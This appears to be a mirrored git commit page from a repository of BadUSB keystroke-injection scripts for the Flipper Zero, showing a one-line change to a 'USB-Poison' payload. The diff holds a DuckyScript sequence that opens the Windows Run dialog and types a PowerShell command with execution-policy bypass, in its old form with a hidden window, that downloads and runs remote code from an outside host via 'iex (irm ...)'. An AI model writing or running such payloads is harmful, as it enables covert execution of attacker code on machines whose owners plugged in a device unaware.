mirror of
https://github.com/beigeworm/BadUSB-Files-For-FlipperZero.git
synced 2025-12-05 20:40:14 -08:00
Update USB-Poison.txt
This commit is contained in:
@@ -11,6 +11,6 @@ REM open powershell (remove "-W H" to show the window)
|
||||
DELAY 1000
|
||||
GUI r
|
||||
DELAY 750
|
||||
STRING powershell -Ep Bypass -W H -C $DLurl = 'YOUR_FILE_URL_HERE'; $File = 'NAME_OF_FILE_TO_COPY' ; iex (irm bw0.cc/usbps)
|
||||
STRING powershell -Ep Bypass -C $DLurl = 'YOUR_FILE_URL_HERE'; $File = 'NAME_OF_FILE_TO_COPY' ; iex (irm bw0.cc/usbps)
|
||||
ENTER
|
||||
|
||||
|
||||
Reference in New Issue
Block a user